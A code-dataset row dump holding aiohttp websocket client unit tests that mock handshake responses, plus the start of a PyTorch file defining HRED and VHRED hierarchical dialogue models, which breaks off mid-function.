hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
07176e46239d5cc5bd09f5c3b6ab4263d8301912 | 15,683 | py | Python | tests/test_websocket_client.py | ajdavis/aiohttp | d5138978f3e82aa82a2f003b00d38112c58a40c1 | [
"Apache-2.0"
] | 1 | 2021-07-07T06:36:57.000Z | 2021-07-07T06:36:57.000Z | tests/test_websocket_client.py | ajdavis/aiohttp | d5138978f3e82aa82a2f003b00d38112c58a40c1 | [
"Apache-2.0"
] | null | null | null | tests/test_websocket_client.py | ajdavis/aiohttp | d5138978f3e82aa82a2f003b00d38112c58a40c1 | [
"Apache-2.0"
] | 1 | 2021-02-09T10:05:59.000Z | 2021-02-09T10:05:59.000Z | import asyncio
import base64
import hashlib
import os
import unittest
from unittest import mock
import aiohttp
from aiohttp import errors, hdrs, websocket, websocket_client
class TestWebSocketClient(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(None)
self.key_data = os.urandom(16)
self.key = base64.b64encode(self.key_data)
self.ws_key = base64.b64encode(
hashlib.sha1(self.key + websocket.WS_KEY).digest()).decode()
def tearDown(self):
self.loop.close()
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect(self, m_req, m_os):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
hdrs.SEC_WEBSOCKET_PROTOCOL: 'chat'
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
res = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
self.assertIsInstance(res, websocket_client.ClientWebSocketResponse)
self.assertEqual(res.protocol, 'chat')
self.assertNotIn(hdrs.ORIGIN, m_req.call_args[1]["headers"])
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_with_origin(self, m_req, m_os):
resp = mock.Mock()
resp.status = 403
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
origin = 'https://example.org/page.html'
with self.assertRaises(errors.WSServerHandshakeError):
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
loop=self.loop,
origin=origin))
self.assertIn(hdrs.ORIGIN, m_req.call_args[1]["headers"])
self.assertEqual(m_req.call_args[1]["headers"][hdrs.ORIGIN], origin)
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_custom_response(self, m_req, m_os):
class CustomResponse(websocket_client.ClientWebSocketResponse):
def read(self, decode=False):
return 'customized!'
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
res = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
ws_response_class=CustomResponse,
loop=self.loop))
self.assertEqual(res.read(), 'customized!')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_global_loop(self, m_req, m_os):
asyncio.set_event_loop(self.loop)
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
resp = self.loop.run_until_complete(
aiohttp.ws_connect('http://test.org'))
self.assertIs(resp._loop, self.loop)
asyncio.set_event_loop(None)
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_err_status(self, m_req, m_os):
resp = mock.Mock()
resp.status = 500
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
with self.assertRaises(errors.WSServerHandshakeError) as ctx:
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
self.assertEqual(
ctx.exception.message, 'Invalid response status')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_err_upgrade(self, m_req, m_os):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: 'test',
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
with self.assertRaises(errors.WSServerHandshakeError) as ctx:
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
self.assertEqual(
ctx.exception.message, 'Invalid upgrade header')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_err_conn(self, m_req, m_os):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: 'close',
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
with self.assertRaises(errors.WSServerHandshakeError) as ctx:
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
self.assertEqual(
ctx.exception.message, 'Invalid connection header')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_err_challenge(self, m_req, m_os):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: 'asdfasdfasdfasdfasdfasdf'
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
with self.assertRaises(errors.WSServerHandshakeError) as ctx:
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
self.assertEqual(
ctx.exception.message, 'Invalid challenge response')
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_close(self, m_req, m_os, WebSocketWriter):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
writer = WebSocketWriter.return_value = mock.Mock()
reader = resp.connection.reader.set_parser.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect('http://test.org', loop=self.loop))
self.assertFalse(resp.closed)
msg = websocket.Message(websocket.MSG_CLOSE, b'', b'')
reader.read.return_value = asyncio.Future(loop=self.loop)
reader.read.return_value.set_result(msg)
res = self.loop.run_until_complete(resp.close())
writer.close.assert_called_with(1000, b'')
self.assertTrue(resp.closed)
self.assertTrue(res)
self.assertIsNone(resp.exception())
# idempotent
res = self.loop.run_until_complete(resp.close())
self.assertFalse(res)
self.assertEqual(writer.close.call_count, 1)
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_close_exc(self, m_req, m_os, WebSocketWriter):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
WebSocketWriter.return_value = mock.Mock()
reader = resp.connection.reader.set_parser.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org', loop=self.loop))
self.assertFalse(resp.closed)
exc = ValueError()
reader.read.return_value = asyncio.Future(loop=self.loop)
reader.read.return_value.set_exception(exc)
self.loop.run_until_complete(resp.close())
self.assertTrue(resp.closed)
self.assertIs(resp.exception(), exc)
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_close_exc2(self, m_req, m_os, WebSocketWriter):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
writer = WebSocketWriter.return_value = mock.Mock()
resp.connection.reader.set_parser.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org', loop=self.loop))
self.assertFalse(resp.closed)
exc = ValueError()
writer.close.side_effect = exc
self.loop.run_until_complete(resp.close())
self.assertTrue(resp.closed)
self.assertIs(resp.exception(), exc)
resp._closed = False
writer.close.side_effect = asyncio.CancelledError()
self.assertRaises(asyncio.CancelledError,
self.loop.run_until_complete, resp.close())
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_send_data_after_close(self, m_req, m_os, WebSocketWriter):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
WebSocketWriter.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org', loop=self.loop))
resp._closed = True
self.assertRaises(RuntimeError, resp.ping)
self.assertRaises(RuntimeError, resp.pong)
self.assertRaises(RuntimeError, resp.send_str, 's')
self.assertRaises(RuntimeError, resp.send_bytes, b'b')
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_send_data_type_errors(self, m_req, m_os, WebSocketWriter):
resp = mock.Mock()
resp.status = 101
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
WebSocketWriter.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org', loop=self.loop))
self.assertRaises(TypeError, resp.send_str, b's')
self.assertRaises(TypeError, resp.send_bytes, 'b')
@mock.patch('aiohttp.client.WebSocketWriter')
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_reader_read_exception(self, m_req, m_os, WebSocketWriter):
hresp = mock.Mock()
hresp.status = 101
hresp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key,
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(hresp)
WebSocketWriter.return_value = mock.Mock()
reader = hresp.connection.reader.set_parser.return_value = mock.Mock()
resp = self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org', loop=self.loop))
exc = ValueError()
reader.read.return_value = asyncio.Future(loop=self.loop)
reader.read.return_value.set_exception(exc)
msg = self.loop.run_until_complete(resp.receive())
self.assertEqual(msg.tp, aiohttp.MsgType.error)
self.assertIs(resp.exception(), exc)
def test_receive_runtime_err(self):
resp = websocket_client.ClientWebSocketResponse(
mock.Mock(), mock.Mock(), mock.Mock(), mock.Mock(), 10.0,
True, True, self.loop)
resp._waiting = True
self.assertRaises(
RuntimeError, self.loop.run_until_complete, resp.receive())
@mock.patch('aiohttp.client.os')
@mock.patch('aiohttp.client.ClientSession.get')
def test_ws_connect_close_resp_on_err(self, m_req, m_os):
resp = mock.Mock()
resp.status = 500
resp.headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_ACCEPT: self.ws_key
}
m_os.urandom.return_value = self.key_data
m_req.return_value = asyncio.Future(loop=self.loop)
m_req.return_value.set_result(resp)
with self.assertRaises(errors.WSServerHandshakeError):
self.loop.run_until_complete(
aiohttp.ws_connect(
'http://test.org',
protocols=('t1', 't2', 'chat'),
loop=self.loop))
resp.close.assert_called_with()
| 37.340476 | 78 | 0.622776 | 1,872 | 15,683 | 5.019765 | 0.076389 | 0.071406 | 0.061296 | 0.084282 | 0.828137 | 0.802171 | 0.787273 | 0.772906 | 0.758434 | 0.758434 | 0 | 0.007085 | 0.262003 | 15,683 | 419 | 79 | 37.429594 | 0.804821 | 0.000638 | 0 | 0.703601 | 0 | 0 | 0.089401 | 0.043648 | 0 | 0 | 0 | 0 | 0.113573 | 1 | 0.052632 | false | 0 | 0.022161 | 0.00277 | 0.083102 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4afa12c1a1aa88755bebef60798cba11d77c8dff | 72,341 | py | Python | model/models.py | yinyan5988/A-Hierarchical-Latent-Structure-for-Variational-Conversation-Modeling | 9fc96098498e80b91e7ca428786dea34dd392c96 | [
"MIT"
] | null | null | null | model/models.py | yinyan5988/A-Hierarchical-Latent-Structure-for-Variational-Conversation-Modeling | 9fc96098498e80b91e7ca428786dea34dd392c96 | [
"MIT"
] | null | null | null | model/models.py | yinyan5988/A-Hierarchical-Latent-Structure-for-Variational-Conversation-Modeling | 9fc96098498e80b91e7ca428786dea34dd392c96 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from utils import to_var, pad, normal_kl_div, normal_logpdf, bag_of_words_loss, to_bow, EOS_ID
import layers
import numpy as np
import random
import pdb
VariationalModels = ['VHRED', 'VHCR','VHCR_new']
class HRED(nn.Module):
def __init__(self, config):
super(HRED, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
def forward(self, input_sentences, input_sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
input_sentences: (Variable, LongTensor) [num_sentences, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
num_sentences = input_sentences.size(0)
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences, max_source_length, hidden_size * direction]
# encoder_hidden: [num_layers * direction, num_sentences, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(input_sentences,
input_sentence_length)
# encoder_hidden: [num_sentences, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(num_sentences, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1])), 0)
# encoder_hidden: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l), max_len)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(encoder_hidden,
input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
# project context_outputs to decoder init state
decoder_init = self.context2decoder(context_outputs)
# [num_layers, batch_size, hidden_size]
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs
else:
# decoder_outputs = self.decoder(target_sentences,
# init_h=decoder_init,
# decode=decode)
# return decoder_outputs.unsqueeze(1)
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# Get top prediction only
# [batch_size, max_unroll]
# prediction = prediction[:, 0]
# [batch_size, beam_size, max_unroll]
return prediction
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
context_hidden=None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
decoder_init = self.context2decoder(context_outputs)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(encoder_hidden,
context_hidden)
samples = torch.stack(samples, 1)
return samples
class VHRED(nn.Module):
def __init__(self, config):
super(VHRED, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.prior_h = layers.FeedForward(config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.posterior_h = layers.FeedForward(config.encoder_hidden_size * self.encoder.num_directions * config.num_layers + config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
if config.bow:
self.bow_h = layers.FeedForward(config.z_sent_size,
config.decoder_hidden_size,
num_layers=1,
hidden_size=config.decoder_hidden_size,
activation=config.activation)
self.bow_predict = nn.Linear(config.decoder_hidden_size, config.vocab_size)
def prior(self, context_outputs):
# Context dependent prior
h_prior = self.prior_h(context_outputs)
mu_prior = self.prior_mu(h_prior)
var_prior = self.softplus(self.prior_var(h_prior))
return mu_prior, var_prior
def posterior(self, context_outputs, encoder_hidden):
h_posterior = self.posterior_h(torch.cat([context_outputs, encoder_hidden], 1))
mu_posterior = self.posterior_mu(h_posterior)
var_posterior = self.softplus(self.posterior_var(h_posterior))
return mu_posterior, var_posterior
def compute_bow_loss(self, target_conversations):
target_bow = np.stack([to_bow(sent, self.config.vocab_size) for conv in target_conversations for sent in conv], axis=0)
target_bow = to_var(torch.FloatTensor(target_bow))
bow_logits = self.bow_predict(self.bow_h(self.z_sent))
bow_loss = bag_of_words_loss(bow_logits, target_bow)
return bow_loss
def forward(self, sentences, sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_inference = encoder_hidden[:, 1:, :]
encoder_hidden_inference_flat = torch.cat(
[encoder_hidden_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_input = encoder_hidden[:, :-1, :]
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(encoder_hidden_input,
input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
mu_prior, var_prior = self.prior(context_outputs)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
if not decode:
mu_posterior, var_posterior = self.posterior(
context_outputs, encoder_hidden_inference_flat)
z_sent = mu_posterior + torch.sqrt(var_posterior) * eps
log_q_zx = normal_logpdf(z_sent, mu_posterior, var_posterior).sum()
log_p_z = normal_logpdf(z_sent, mu_prior, var_prior).sum()
# kl_div: [num_sentneces]
kl_div = normal_kl_div(mu_posterior, var_posterior,
mu_prior, var_prior)
kl_div = torch.sum(kl_div)
else:
z_sent = mu_prior + torch.sqrt(var_prior) * eps
kl_div = None
log_p_z = normal_logpdf(z_sent, mu_prior, var_prior).sum()
log_q_zx = None
self.z_sent = z_sent
latent_context = torch.cat([context_outputs, z_sent], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
